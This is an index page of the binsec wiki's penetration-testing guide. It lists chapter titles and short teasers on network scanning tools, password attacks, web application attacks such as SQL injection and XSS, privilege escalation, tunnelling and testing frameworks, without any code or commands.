info@binsec.com
English
Deutsch
English
Wiki
Keywords
Deutsch
English
binsec wiki
Hacking
The Hacking Guide
Taking a look back, we learned about non-technical but essential aspects of penetration testing in the last chapters. In a …
Hacking I: Scanning networks
In some cases, we need to identify the network ranges of a company ourselves for penetration testing. In the case …
Tool introduction: nmap
To identify accessible servers in a network range, nmap can perform a ping sweep using the ICMP protocol. In this …
Tool introduction: masscan
When performing a port scan against an IT infrastructure, we must assume that services can be accessed via any IP …
Tool introduction: netcat
Now that we are able to identify open ports and accessible services on a target system, we can also communicate …
Tool introduction: dig
The domain name can provide important information about the job of a target system: As humans have a hard time …
Particularities of IPv6 networks
In this day and age, networks can no longer be scanned only on IPv4 networks. Many companies are gradually migrating …
Hacking II: Password attacks
In review, scanning networks is the foundation of any attack, as this allows us to discover our attack surface. But …
Online password attacks
Network services usually authenticate their users by means of a user name and associated password. If we know of the …
Offline password attacks
Unlike online password attacks, the hashes of the user passwords are available for offline password attacks. A cryptographic hash function …
Hacking III: Web application attacks
User authentication by password is often implemented in web applications. Individual users may be assigned different roles. As a payment …
Broken Access Control
In 2021, vulnerabilities in authorization scheme were ranked as the top risk in web applications by the OWASP Top 10 …
SQL Injections (SQLi)
According to the OWASP TOP 10, injections are among the three most common vulnerabilities in web applications. This also includes …
Cross-Site Scripting (XSS)
In addition to SQL injection, injection attacks also include cross-site scripting. Due to the lack of input validation, cross-site scripting …
Hacking IV: Privilege Escalation
We have successfully mastered our first step as an attacker: executing commands on our target system. But in most cases, …
Information Gathering
The phase of collecting information is an important part in our process. We are especially looking for information concerning the …
Local Root Exploits
So-called local root exploits often exist especially for older operating systems, which exploit vulnerabilities in the kernel when expanding privileges, …
File Transfer
After we have “built“ an exploit locally on our attacking machine, we still have to transfer it to the target …
Hacking V: Tunnelling Techniques
We deliberately also kept an eye out for network information during privilege escalation, because IT infrastructure is often split into …
Hacking VI: Vulnerability scanner and penetration testing frameworks
It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, …